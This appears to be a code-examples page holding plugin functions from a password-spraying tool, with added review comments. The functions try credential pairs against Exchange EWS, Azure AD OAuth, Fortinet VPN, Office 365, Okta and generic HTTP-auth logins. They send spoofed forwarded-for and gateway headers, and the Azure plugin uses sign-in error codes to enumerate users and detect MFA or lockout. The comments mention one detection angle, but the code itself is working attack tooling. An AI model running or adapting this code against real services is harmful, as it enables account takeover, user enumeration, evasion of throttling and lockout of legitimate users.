Beispiel #1
def testconnect(pluginargs, args, api_dict, useragent):
    """Send one GET to the configured proxy URL and record the domain it reports.

    A 504 from the endpoint is treated as "unreachable" and stops the run.
    Any other status continues: ``get_owa_domain`` (defined elsewhere) is
    queried for ``/autodiscover/autodiscover.xml`` and its result is stored
    in ``pluginargs['domain']``. ``args`` is accepted but not used here.

    Returns:
        A ``(success, output, pluginargs)`` tuple.
    """
    target = api_dict['proxy_url']

    # The forwarded-for, gateway-id and trace-id values come from local
    # generator helpers, i.e. they are caller-chosen. A service receiving
    # such headers should not treat them as the real client address.
    request_headers = {
        'User-Agent': useragent,
        "X-My-X-Forwarded-For": generate_ip(),
        "x-amzn-apigateway-api-id": generate_id(),
        "X-My-X-Amzn-Trace-Id": generate_trace_id(),
    }

    # NOTE(review): verify=False disables TLS certificate validation and no
    # timeout is set, so the call can block indefinitely and the peer's
    # identity is never checked.
    reply = requests.get(target, headers=request_headers, verify=False)

    if reply.status_code == 504:
        return False, "Testconnect: Connection failed, endpoint timed out, exiting", pluginargs

    template = "Testconnect: Fingerprinting host... Internal Domain name: {domain}, continuing"
    found_domain = get_owa_domain(target, "/autodiscover/autodiscover.xml", useragent)
    message = template.format(domain=found_domain)
    pluginargs['domain'] = found_domain

    return True, message, pluginargs
Beispiel #2
def ews_authenticate(url, username, password, useragent, pluginargs):
    """Attempt one NTLM-authenticated POST to ``{url}/ews/`` and report the outcome.

    Returns the standard result dictionary. Only ``success``, ``error`` and
    ``output`` are updated after the request; the remaining keys keep their
    defaults. ``pluginargs`` is accepted but not used here.

    NOTE(review): every status other than 401 is reported as valid
    credentials, including 404 and 5xx replies, so a "found" line is not
    proof of a successful logon and needs independent confirmation.

    NOTE(review): the attempted password is stored in the result and embedded
    in the output text, so any log or report built from it holds cleartext
    credentials and must be protected accordingly.
    """
    stamp = datetime.datetime.utcnow().strftime('%Y-%m-%d %H:%M:%S')

    data_response = {
        'timestamp': stamp, 'username': username, 'password': password,
        'success': False, 'change': False, '2fa_enabled': False,
        'type': None, 'code': None, 'name': None, 'action': None,
        'headers': [], 'cookies': [],
        'sourceip': None, 'throttled': False, 'error': False,
        'output': "",
    }

    # Caller-chosen values from local generators; not a real client address.
    headers = {
        'User-Agent': useragent,
        "X-My-X-Forwarded-For": generate_ip(),
        "x-amzn-apigateway-api-id": generate_id(),
        "X-My-X-Amzn-Trace-Id": generate_trace_id(),
        "Content-Type": "text/xml",
    }

    try:
        # NOTE(review): verify=False skips certificate validation while
        # credentials are in flight; no timeout is set either.
        resp = requests.post("{}/ews/".format(url),
                             headers=headers,
                             auth=HttpNtlmAuth(username, password),
                             verify=False)

        rejected = resp.status_code == 401
        if rejected:
            data_response['output'] = f"[-] Authentication failed: {username}:{password} (Invalid credentials)"
        else:
            data_response['success'] = True
            data_response['output'] = f"[+] Found credentials, code: {resp.status_code}: {username}:{password}"

    except Exception as ex:
        # Every failure lands here; 'output' then holds the exception object
        # itself rather than a string.
        data_response['error'] = True
        data_response['output'] = ex

    return data_response
Beispiel #3
def testconnect(pluginargs, args, api_dict, useragent):
    """Check that the configured proxy URL answers a plain GET.

    Only a 504 status counts as failure; every other status is reported as a
    working connection. ``args`` is accepted but not used, and ``pluginargs``
    is returned unchanged.

    Returns:
        A ``(success, output, pluginargs)`` tuple.
    """
    # Caller-chosen values from local generators; not a real client address.
    request_headers = {
        'User-Agent': useragent,
        "X-My-X-Forwarded-For": generate_ip(),
        "x-amzn-apigateway-api-id": generate_id(),
        "X-My-X-Amzn-Trace-Id": generate_trace_id(),
    }

    # NOTE(review): no timeout is passed, so this call can block indefinitely.
    reply = requests.get(api_dict['proxy_url'], headers=request_headers)

    timed_out = reply.status_code == 504
    if timed_out:
        message = "Testconnect: Connection failed, endpoint timed out, exiting"
    else:
        message = "Testconnect: Connection success, continuting"

    return (not timed_out), message, pluginargs
Beispiel #4
def testconnect(pluginargs, args, api_dict, useragent):
    """Fetch ``/remote/login?lang=en`` through the proxy URL and look for a Fortinet marker.

    A 504 status is the only failure case. Otherwise the check succeeds, and
    the message states whether the substring ``fortinet`` was present in the
    response body. ``args`` is accepted but not used, and ``pluginargs`` is
    returned unchanged.

    Returns:
        A ``(success, output, pluginargs)`` tuple.
    """
    # Caller-chosen values from local generators; not a real client address.
    request_headers = {
        'User-Agent': useragent,
        "X-My-X-Forwarded-For": generate_ip(),
        "x-amzn-apigateway-api-id": generate_id(),
        "X-My-X-Amzn-Trace-Id": generate_trace_id(),
    }

    # NOTE(review): no timeout is passed, so this call can block indefinitely.
    login_page = api_dict['proxy_url'] + "/remote/login?lang=en"
    resp = requests.get(login_page, headers=request_headers)

    if resp.status_code == 504:
        return False, "Testconnect: Connection failed, endpoint timed out, exiting", pluginargs

    # The substring match is case-sensitive and is the only fingerprint used.
    if "fortinet" in resp.text:
        verdict = "Testconnect: Verified Fortinet instance, connected"
    else:
        verdict = "Testconnect: Warning, Fortinet client not indicated, continuting"

    return True, verdict, pluginargs
Beispiel #5
def msol_authenticate(url, username, password, useragent, pluginargs):
    """Submit one username/password pair to ``{url}/common/oauth2/token`` and classify the reply.

    The request is an OAuth2 password-grant token request
    (``grant_type=password``). A 200 reply is recorded as success. Any other
    reply is parsed as JSON and its ``error_description`` is searched for
    AADSTS error codes, which decide the ``success``, ``2fa_enabled`` and
    ``change`` flags and the output text. ``pluginargs`` is accepted but not
    used here.

    The distinct error codes separate "unknown user", "wrong password",
    "locked" and "MFA required". The same codes are what an identity team
    would look for per sign-in attempt when reviewing authentication logs for
    this pattern (many accounts, few passwords, password-grant flow).

    NOTE(review): the attempted password is stored in the result and embedded
    in several output strings; anything that logs or stores the result holds
    cleartext credentials.

    Returns:
        The populated result dictionary.
    """

    ts = datetime.datetime.utcnow().strftime('%Y-%m-%d %H:%M:%S')

    # Result record shared by the authenticate functions; this function only
    # updates success, change, 2fa_enabled, code, error and output.
    data_response = {
        'timestamp': ts,
        'username': username,
        'password': password,
        'success': False,
        'change': False,
        '2fa_enabled': False,
        'type': None,
        'code': None,
        'name': None,
        'action': None,
        'headers': [],
        'cookies': [],
		'sourceip' : None,
        'throttled' : False,
		'error' : False,
        'output' : ""
    }

    # Form body of the token request.
    # NOTE(review): the client_id is a fixed constant; it looks like a
    # well-known first-party application id — confirm before relying on it
    # as a detection pivot.
    body = {
        'resource': 'https://graph.windows.net',
        'client_id': '1b730954-1685-4b74-9bfd-dac224a7b894',
        'client_info': '1',
        'grant_type': 'password',
        'username': username,
        'password': password,
        'scope': 'openid',
    }

    # Values produced by local generator helpers (defined elsewhere); they are
    # caller-chosen, not a real client address or gateway identifier.
    spoofed_ip = generate_ip()
    amazon_id = generate_id()
    trace_id = generate_trace_id()

    headers = {
        "X-My-X-Forwarded-For" : spoofed_ip,
        "x-amzn-apigateway-api-id" : amazon_id,
        "X-My-X-Amzn-Trace-Id" : trace_id,
        "User-Agent" : useragent,

        'Accept': 'application/json',
        'Content-Type': 'application/x-www-form-urlencoded'
    }

    try:
        # NOTE(review): no timeout is passed, so this call can block indefinitely.
        resp = requests.post("{}/common/oauth2/token".format(url), headers=headers, data=body)
        data_response['code'] = resp.status_code

        if resp.status_code == 200:
            data_response['success'] = True
            data_response['output'] = f"SUCCESS! {resp.status_code} {username}:{password}"

        else:
            # A non-JSON body or a missing "error_description" key raises
            # here and is absorbed by the broad except below.
            response = resp.json()
            error = response["error_description"]

            # Branch order matters: the first code found in the text wins.
            if "AADSTS50126" in error:
                data_response['success'] = False
                data_response['output'] = f"FAILED. {resp.status_code} Invalid username or password. Username: {username} could exist."

            elif "AADSTS50128" in error or "AADSTS50059" in error:
                data_response['success'] = False
                data_response['output'] = f"FAILED. {resp.status_code} Tenant for account {username} is not using AzureAD/Office365"

            elif "AADSTS50034" in error:
                data_response['success'] = False
                data_response['output'] = f"FAILED. {resp.status_code} The user {username} doesn't exist."

            elif "AADSTS50079" in error or "AADSTS50076" in error:
                # Microsoft MFA response
                # Recorded as success: the code treats an MFA challenge as
                # evidence that the password itself was accepted.
                data_response['2fa_enabled'] = True
                data_response['success'] = True
                data_response['code'] = "2FA Microsoft"
                data_response['output'] = f"SUCCESS! {resp.status_code} {username}:{password} - NOTE: The response indicates MFA (Microsoft) is in use."


            elif "AADSTS50158" in error:
                # Conditional Access response (Based off of limited testing this seems to be the response to DUO MFA)
                data_response['2fa_enabled'] = True
                data_response['success'] = True
                data_response['code'] = "2FA Other"
                data_response['output'] = f"SUCCESS! {resp.status_code} {username}:{password} - NOTE: The response indicates conditional access (MFA: DUO or other) is in use."


            elif "AADSTS50053" in error:
                # Locked out account or Smart Lockout in place
                # Repeated attempts against one account can cause this state
                # and deny service to the legitimate user.
                data_response['success'] = False
                data_response['output'] = f"WARNING! {resp.status_code} The account {username} appears to be locked."


            elif "AADSTS50055" in error:
                # User password is expired
                data_response['change'] = True
                data_response['success'] = True
                data_response['output'] = f"SUCCESS! {resp.status_code} {username}:{password} - NOTE: The user's password is expired."

            else:
                # Unknown errors
                data_response['success'] = False
                data_response['output'] = f"FAILED. {resp.status_code} Got an error we haven't seen yet for user {username}"

    except Exception as ex:
        # Every failure (network, JSON parsing, missing key) ends up here;
        # 'output' then holds the exception object itself, not a string.
        data_response['error'] = True
        data_response['output'] = ex
        pass

    return data_response
Beispiel #6
def template_authenticate(
        url, username, password, useragent,
        pluginargs):  # CHANGEME: replace template with plugin name
    """Skeleton for a plugin's authenticate function; not runnable as written.

    It builds the standard result dictionary, sends a POST to ``{url}/uri``
    and then branches on the placeholder names ``Success``,
    ``Success_but_2fa`` and ``lockout_or_pwd_expired_or_other``. Those names
    are not defined in this block, so unless they are replaced the first
    condition raises ``NameError``, which the broad ``except`` turns into
    ``error=True``. ``pluginargs`` is accepted but not used here.

    NOTE(review): the attempted password is stored in the result and placed
    in every output string; plugins derived from this template inherit
    cleartext credentials in logs and reports unless that is changed.

    Returns:
        The result dictionary.
    """

    ts = datetime.datetime.utcnow().strftime('%Y-%m-%d %H:%M:%S')

    # not all of these are used, provided for future dev if needed
    # Only ones necessary to return at the moment are:
    # error
    # output
    # success
    data_response = {
        'timestamp': ts,
        'username': username,
        'password': password,
        'success': False,
        'change': False,
        '2fa_enabled': False,
        'type': None,
        'code': None,
        'name': None,
        'action': None,
        'headers': [],
        'cookies': [],
        'sourceip': None,
        'throttled': False,
        'error': False,
        'output': ""
    }

    # Values produced by local generator helpers (defined elsewhere); they are
    # caller-chosen, not a real client address or gateway identifier.
    spoofed_ip = generate_ip()
    amazon_id = generate_id()
    trace_id = generate_trace_id()

    # CHANGEME: Add more if necessary
    headers = {
        'User-Agent': useragent,
        "X-My-X-Forwarded-For": spoofed_ip,
        "x-amzn-apigateway-api-id": amazon_id,
        "X-My-X-Amzn-Trace-Id": trace_id,
    }

    try:

        # The request carries no body, no credentials and no timeout; the
        # "/uri" path is a placeholder.
        resp = requests.post("{}/uri".format(url), headers=headers)

        # Placeholder condition: an undefined name until the plugin author
        # replaces it.
        if Success:
            data_response['success'] = True
            data_response['output'] = 'SUCCESS_MESSAGE: => {}:{}'.format(
                username, password)

        elif Success_but_2fa:
            data_response['success'] = True
            data_response['output'] = 'SUCCESS_2FA_MESSAGE: => {}:{}'.format(
                username, password)
            data_response['2fa_enabled'] = True

        elif lockout_or_pwd_expired_or_other:
            data_response['success'] = False
            data_response['output'] = 'ISSUE_MESSAGE: {} => {}:{}'.format(
                resp.status_code, username, password)

        else:  #fail
            data_response['success'] = False
            data_response['output'] = 'FAILURE_MESSAGE: {} => {}:{}'.format(
                resp.status_code, username, password)
            # NOTE(review): the failure branch also sets 2fa_enabled; this
            # looks like a copy/paste leftover — confirm.
            data_response['2fa_enabled'] = True

    except Exception as ex:
        # Every failure ends up here, including the NameError from the
        # placeholders; 'output' then holds the exception object itself.
        data_response['error'] = True
        data_response['output'] = ex
        pass

    return data_response
Beispiel #7
def fortinetvpn_authenticate(url, username, password, useragent, pluginargs):
    """POST one credential pair to ``{url}/remote/logincheck`` and classify the reply.

    The attempt counts as successful only when the status is 200 and the body
    contains both ``redir=`` and ``&portal=``. If ``pluginargs`` holds a
    ``domain`` entry, it is sent as the ``realm`` form field and appended to
    the success message.

    NOTE(review): the attempted password is stored in the result and embedded
    in the output text, so logs and reports built from it contain cleartext
    credentials.

    Returns:
        The populated result dictionary.
    """
    stamp = datetime.datetime.utcnow().strftime('%Y-%m-%d %H:%M:%S')

    data_response = {
        'timestamp': stamp, 'username': username, 'password': password,
        'success': False, 'change': False, '2fa_enabled': False,
        'type': None, 'code': None, 'name': None, 'action': None,
        'headers': [], 'cookies': [],
        'sourceip': None, 'throttled': False, 'error': False,
        'output': "",
    }

    # Caller-chosen values from local generators; not a real client address.
    headers = {
        'User-Agent': useragent,
        "X-My-X-Forwarded-For": generate_ip(),
        "x-amzn-apigateway-api-id": generate_id(),
        "X-My-X-Amzn-Trace-Id": generate_trace_id(),
        'Content-Type': 'application/x-www-form-urlencoded',
    }

    realm_given = 'domain' in pluginargs
    form_fields = {
        "ajax": '1',
        'username': username,
        'credential': password,
        'realm': pluginargs['domain'] if realm_given else '',
    }

    try:
        # NOTE(review): no timeout is passed, so this call can block indefinitely.
        resp = requests.post("{}/remote/logincheck".format(url), data=form_fields, headers=headers)

        accepted = resp.status_code == 200 and 'redir=' in resp.text and '&portal=' in resp.text

        if not accepted:
            data_response['output'] = 'FAILURE: {} => {}:{}'.format(resp.status_code, username, password)
        else:
            message = 'SUCCESS: => {}:{}'.format(username, password)
            if realm_given:
                message = message + " Domain: {}".format(pluginargs['domain'])
            data_response['success'] = True
            data_response['output'] = message

    except Exception as ex:
        # Every failure ends up here; 'output' then holds the exception
        # object itself rather than a string.
        data_response['error'] = True
        data_response['output'] = ex

    return data_response
Beispiel #8
def o365_authenticate(url, username, password, useragent, pluginargs):
    """Try one credential pair with HTTP basic auth against ``{url}/autodiscover/autodiscover.xml``.

    Status 200 is reported as success, 456 as success with a "2FA or Locked"
    note, and everything else as failure. ``pluginargs`` is accepted but not
    used here.

    NOTE(review): the attempted password is stored in the result and embedded
    in the output text, so logs and reports built from it contain cleartext
    credentials.

    Returns:
        The populated result dictionary.
    """
    stamp = datetime.datetime.utcnow().strftime('%Y-%m-%d %H:%M:%S')

    data_response = {
        'timestamp': stamp, 'username': username, 'password': password,
        'success': False, 'change': False, '2fa_enabled': False,
        'type': None, 'code': None, 'name': None, 'action': None,
        'headers': [], 'cookies': [],
        'sourceip': None, 'throttled': False, 'error': False,
        'output': "",
    }

    # Caller-chosen values from local generators; not a real client address.
    headers = {
        'User-Agent': useragent,
        "X-My-X-Forwarded-For": generate_ip(),
        "x-amzn-apigateway-api-id": generate_id(),
        "X-My-X-Amzn-Trace-Id": generate_trace_id(),
        "Content-Type": "text/xml",
    }

    try:
        # NOTE(review): verify=False skips certificate validation while
        # basic-auth credentials are in flight.
        r = requests.get("{}/autodiscover/autodiscover.xml".format(url),
                         auth=(username, password),
                         headers=headers,
                         verify=False,
                         timeout=30)

        if r.status_code == 200:
            label, accepted = "SUCCESS: {username}:{password}", True
        elif r.status_code == 456:
            # The 2fa_enabled flag is left at its default on this path.
            label, accepted = "SUCCESS: {username}:{password} - 2FA or Locked", True
        else:
            label, accepted = "FAILED: {username}:{password}", False

        data_response['output'] = label.format(username=username, password=password)
        data_response['success'] = accepted

    except Exception as ex:
        # Every failure ends up here; 'output' then holds the exception
        # object itself rather than a string.
        data_response['error'] = True
        data_response['output'] = ex

    return data_response
Beispiel #9
 def get(self, *_args, **_kwargs):
     """Pass a newly generated id to ``self.success`` under the key ``generate_id``.

     Positional and keyword arguments are accepted and ignored.
     """
     payload = {"generate_id": generate_id()}
     self.success(data=payload)
Beispiel #10
def httpbrute_authenticate(
        url, username, password, useragent,
        pluginargs):  # CHANGEME: replace template with plugin name
    """Try one credential pair against ``{url}/{pluginargs['uri']}`` with HTTP auth.

    ``pluginargs['auth']`` selects the scheme: ``'basic'``, ``'digest'``, or
    NTLM for any other value. Status 200 is reported as success, 401 as
    failure, and any other status as an unknown response.

    NOTE(review): the attempted password is stored in the result and embedded
    in the output text, so logs and reports built from it contain cleartext
    credentials.

    Returns:
        The populated result dictionary.
    """
    stamp = datetime.datetime.utcnow().strftime('%Y-%m-%d %H:%M:%S')

    data_response = {
        'timestamp': stamp, 'username': username, 'password': password,
        'success': False, 'change': False, '2fa_enabled': False,
        'type': None, 'code': None, 'name': None, 'action': None,
        'headers': [], 'cookies': [],
        'sourceip': None, 'throttled': False, 'error': False,
        'output': "",
    }

    # CHANGEME: Add more if necessary
    # Assembled as in the sibling plugins, but not passed to the request below.
    headers = {
        'User-Agent': useragent,
        "X-My-X-Forwarded-For": generate_ip(),
        "x-amzn-apigateway-api-id": generate_id(),
        "X-My-X-Amzn-Trace-Id": generate_trace_id(),
    }

    try:
        full_url = "{}/{}".format(url, pluginargs['uri'])
        scheme = pluginargs['auth']

        if scheme == 'basic':
            auth = requests.auth.HTTPBasicAuth(username, password)
        elif scheme == 'digest':
            auth = requests.auth.HTTPDigestAuth(username, password)
        else:  # NTLM
            auth = requests_ntlm.HttpNtlmAuth(username, password)

        # NOTE(review): verify=False skips certificate validation while
        # credentials are in flight.
        resp = requests.get(url=full_url, auth=auth, verify=False, timeout=30)

        status = resp.status_code
        if status == 200:
            data_response['success'] = True
            data_response['output'] = 'SUCCESS: => {}:{}'.format(username, password)
        elif status == 401:
            data_response['output'] = 'FAILURE: => {}:{}'.format(username, password)
        else:  # any other status
            data_response['output'] = 'UNKNOWN_RESPONSE_CODE: {} => {}:{}'.format(
                status, username, password)

    except Exception as ex:
        # Every failure ends up here, including a missing 'uri' or 'auth'
        # key; 'output' then holds the exception object itself.
        data_response['error'] = True
        data_response['output'] = ex

    return data_response
Beispiel #11
def okta_authenticate(url, username, password, useragent, pluginargs):
    """POST one credential pair to ``{url}/api/v1/authn/`` and classify the reply.

    A 200 reply is decoded as JSON and its ``status`` field decides the
    outcome: ``SUCCESS``, ``MFA_REQUIRED`` and ``PASSWORD_EXPIRED`` are
    reported as valid credentials, while ``LOCKED_OUT`` and any other status
    are failures. A 403 is reported as throttling, and any other HTTP status
    as a plain failure. ``pluginargs`` is accepted but not used here.

    NOTE(review): the JSON body is built by string interpolation rather than
    a serializer, so values containing quotes or backslashes produce a
    malformed document.

    NOTE(review): the attempted password is stored in the result and embedded
    in the output text, so logs and reports built from it contain cleartext
    credentials.

    Returns:
        The populated result dictionary.
    """
    stamp = datetime.datetime.utcnow().strftime('%Y-%m-%d %H:%M:%S')

    data_response = {
        'timestamp': stamp, 'username': username, 'password': password,
        'success': False, 'change': False, '2fa_enabled': False,
        'type': None, 'code': None, 'name': None, 'action': None,
        'headers': [], 'cookies': [],
        'sourceip': None, 'throttled': False, 'error': False,
        'output': "",
    }

    raw_body = "{\"username\":\"%s\",\"password\":\"%s\",\"options\":{\"warnBeforePasswordExpired\":true,\"multiOptionalFactorEnroll\":true}}" % (
        username, password)

    # Caller-chosen values from local generators; not a real client address.
    headers = {
        'User-Agent': useragent,
        "X-My-X-Forwarded-For": generate_ip(),
        "x-amzn-apigateway-api-id": generate_id(),
        "X-My-X-Amzn-Trace-Id": generate_trace_id(),
        'Content-Type': 'application/json',
    }

    try:
        # NOTE(review): no timeout is passed, so this call can block indefinitely.
        resp = requests.post("{}/api/v1/authn/".format(url),
                             data=raw_body,
                             headers=headers)
        http_status = resp.status_code

        if http_status == 200:
            authn_state = json.loads(resp.text).get("status")

            # Warning: administrators can configure Okta to not indicate that
            # an account is locked out.
            if authn_state == "LOCKED_OUT":
                data_response['output'] = 'FAILED: Locked out {}:{}'.format(username, password)
                data_response['action'] = 'redirect'

            elif authn_state == "SUCCESS":
                data_response['success'] = True
                data_response['output'] = 'SUCCESS: => {}:{}'.format(username, password)

            elif authn_state == "MFA_REQUIRED":
                data_response['2fa_enabled'] = True
                data_response['success'] = True
                data_response['output'] = "SUCCESS: 2FA => {}:{}".format(username, password)

            elif authn_state == "PASSWORD_EXPIRED":
                data_response['change'] = True
                data_response['success'] = True
                data_response['output'] = "SUCCESS: password expired {}:{}".format(
                    username, password)

            else:
                data_response['output'] = "ALERT: 200 but doesn't indicate success {}:{}".format(
                    username, password)

        else:
            # Only non-200 replies record the HTTP status in 'code'.
            data_response['code'] = http_status
            if http_status == 403:
                failure_text = "FAILED THROTTLE INDICATED: {} => {}:{}"
            else:
                failure_text = "FAILED: {} => {}:{}"
            data_response['output'] = failure_text.format(http_status, username, password)

    except Exception as ex:
        # Every failure (network, JSON decoding, unexpected shape) ends up
        # here; 'output' then holds the exception object itself.
        data_response['error'] = True
        data_response['output'] = ex

    return data_response